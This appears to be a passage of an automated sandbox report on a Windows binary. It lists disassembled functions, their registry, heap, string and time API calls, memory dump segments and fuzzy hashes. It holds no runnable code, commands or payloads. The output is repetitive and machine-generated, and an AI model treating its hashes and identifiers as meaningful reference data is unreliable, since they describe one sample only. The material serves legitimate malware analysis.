                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: fb51181e03ceb3a90fb71e1016e28f08c61a464ea28ebc853029e4ba336a3f6d
                          • Instruction ID: ef3c641950d25003a85ee71c29f446933f2f7acfadf4867beb197e41391b6256
                          • Opcode Fuzzy Hash: fb51181e03ceb3a90fb71e1016e28f08c61a464ea28ebc853029e4ba336a3f6d
                          • Instruction Fuzzy Hash: 6501B971B04614AFD704DF98DD45B6EB7B9FB44711F50012AF906E7380D7B8590086E5
                          Function 0041D7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00FBD7A8,00000000,00020119,?), ref: 0041D7F5
                          • RegQueryValueExA.ADVAPI32(?,00FBE0C8,00000000,00000000,00000000,000000FF), ref: 0041D819
                          • RegCloseKey.ADVAPI32(?), ref: 0041D823
                          • lstrcat.KERNEL32(?,00000000), ref: 0041D848
                          • lstrcat.KERNEL32(?,00FBDF30), ref: 0041D85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: ac4654c9b423e5f92f1e0f5bbd4689b147bb9237eec9d2d29ba4c608ca516213
                          • Instruction ID: ebb675e1f18c9ff88a6f8fc4f084349e0bd5ec3e988502ddfef77187666a6176
                          • Opcode Fuzzy Hash: ac4654c9b423e5f92f1e0f5bbd4689b147bb9237eec9d2d29ba4c608ca516213
                          • Instruction Fuzzy Hash: 5C41A671A1020CAFCB54EF68EC86BDE7775AF44308F404069B509A7291EE74AA89CFD5
                          Function 00417EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00417F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00417F60
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 00417FA5
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 00417FD3
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 00418007
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 27ee802af8f57e5b22a2aa5ddacbdac98787300f0224adeae04b18bbf0927ecd
                          • Instruction ID: a47a97511255cf1e93cbb1994b44434e641159a6d8ba5c9092000f8818cae911
                          • Opcode Fuzzy Hash: 27ee802af8f57e5b22a2aa5ddacbdac98787300f0224adeae04b18bbf0927ecd
                          • Instruction Fuzzy Hash: D8418E7060411ADFCB20DF68D884EEF77B4EF58300F11409AE8059B351DB78AA96CF95
                          Function 00418050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 004180BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004180EA
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 00418102
                          • lstrlen.KERNEL32(00000000), ref: 00418140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 03c5d7b75bc190de1076f6e13919b025d67f824dacdced373c74aa1090816c3c
                          • Instruction ID: 76ebc02826cfc164f246855d272761f98fffe6926c554f914627be4f1755e0ee
                          • Opcode Fuzzy Hash: 03c5d7b75bc190de1076f6e13919b025d67f824dacdced373c74aa1090816c3c
                          • Instruction Fuzzy Hash: DC418F72600206ABDB21DF68D948BEBBBF4EF44700F11841EA845D7254EF78D985CB94
                          Function 00421B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00421B72
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0042184F
                            • Part of subcall function 00421820: lstrlen.KERNEL32(00FA6058), ref: 00421860
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,00000000), ref: 00421887
                            • Part of subcall function 00421820: lstrcat.KERNEL32(00000000,00000000), ref: 00421892
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,00000000), ref: 004218C1
                            • Part of subcall function 00421820: lstrlen.KERNEL32(00434FA0), ref: 004218D3
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,00000000), ref: 004218F4
                            • Part of subcall function 00421820: lstrcat.KERNEL32(00000000,00434FA0), ref: 00421900
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,00000000), ref: 0042192F
                          • sscanf.NTDLL ref: 00421B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BC6
                          • ExitProcess.KERNEL32 ref: 00421BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
                          • Instruction ID: 276e4b54b55f1c3fc1aac48e3fc79cc90fd1a426ff4117ad04e9df3e7fe316e2
                          • Opcode Fuzzy Hash: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
                          • Instruction Fuzzy Hash: A72102B1508301AF8344EF69D88485BBBF9EED8304F409A1EF599C3220E774E508CFA6
                          Function 00423130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00423166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0042316D
                          • RegOpenKeyExA.ADVAPI32(80000002,00FABAB8,00000000,00020119,?), ref: 0042318C
                          • RegQueryValueExA.ADVAPI32(?,00FBD5C8,00000000,00000000,00000000,000000FF), ref: 004231A7
                          • RegCloseKey.ADVAPI32(?), ref: 004231B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: a379eebdbbcec35e8ed859733ff2708c3a1330b01a2a2298d96069c18e9e916f
                          • Instruction ID: 72d06ee534f6cf1181431bf03795815ec5e5a6cf7f7641d8e7f8cf2242cfd827
                          • Opcode Fuzzy Hash: a379eebdbbcec35e8ed859733ff2708c3a1330b01a2a2298d96069c18e9e916f
                          • Instruction Fuzzy Hash: 23116072A04219AFD714CB94EC45BABB7BDEB48711F00411AFA05D3680DB7459048BE1
                          Function 004290DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: ffa0fc8cb5b117a572237663c2bf107fb99d826a99f32ac2768660c11bf34147
                          • Instruction ID: 3cc3571cb7d3249784501328a2d6d89bea399650c511c2e715f1fbad0d9813f4
                          • Opcode Fuzzy Hash: ffa0fc8cb5b117a572237663c2bf107fb99d826a99f32ac2768660c11bf34147
                          • Instruction Fuzzy Hash: 8A41587020036CAEEB318B259C84FFB7BFC9F45304F5448E9E98682182E2749E45CF28
                          Function 00408980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00408996
                            • Part of subcall function 0042A1C0: std::exception::exception.LIBCMT ref: 0042A1D5
                            • Part of subcall function 0042A1C0: std::exception::exception.LIBCMT ref: 0042A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 004089CD
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: cf06c6c856652c21ea2d01edeea654692fedbbab4fa9a7616b73302648be6306
                          • Instruction ID: b6eb26a96cfbca8ec75c0cd6a4033348675f8408321a396137d56c2385240345
                          • Opcode Fuzzy Hash: cf06c6c856652c21ea2d01edeea654692fedbbab4fa9a7616b73302648be6306
                          • Instruction Fuzzy Hash: DF21D8723006508BC720AA5CE940A6AF7A59BA1761B20093FF5C1DB6C1CB75D851C7AD
                          Function 00408850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00408883
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 3675c89aaac7e4bf513d3378d2b1284600e2121f734ac1cf293c303742f63245
                          • Instruction ID: 7564ff16f4fded24fea60b23033fc6fb145d6f62840a653eb56d940b242daf0a
                          • Opcode Fuzzy Hash: 3675c89aaac7e4bf513d3378d2b1284600e2121f734ac1cf293c303742f63245
                          • Instruction Fuzzy Hash: FD31B7B5E005159BCB08DF58C9906AEBBB6EB88350F14827EE905EB384DB34AD01CBD5
                          Function 00425910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425922
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: 72ce411f60a9603ccc78830aed89491ef0d3d3f59f8d142ff26189d7cf510ab7
                          • Instruction ID: e608baf2c9de7f9df9e69f655c31c4c623940675a2f9202cf60dc1873617e265
                          • Opcode Fuzzy Hash: 72ce411f60a9603ccc78830aed89491ef0d3d3f59f8d142ff26189d7cf510ab7
                          • Instruction Fuzzy Hash: 91117070304B60CBD7218B2CF90071AB7E1ABD6760FA50A9FE0D187795C779E881C7A9
                          Function 00423CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0042A430,000000FF), ref: 00423D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423D27
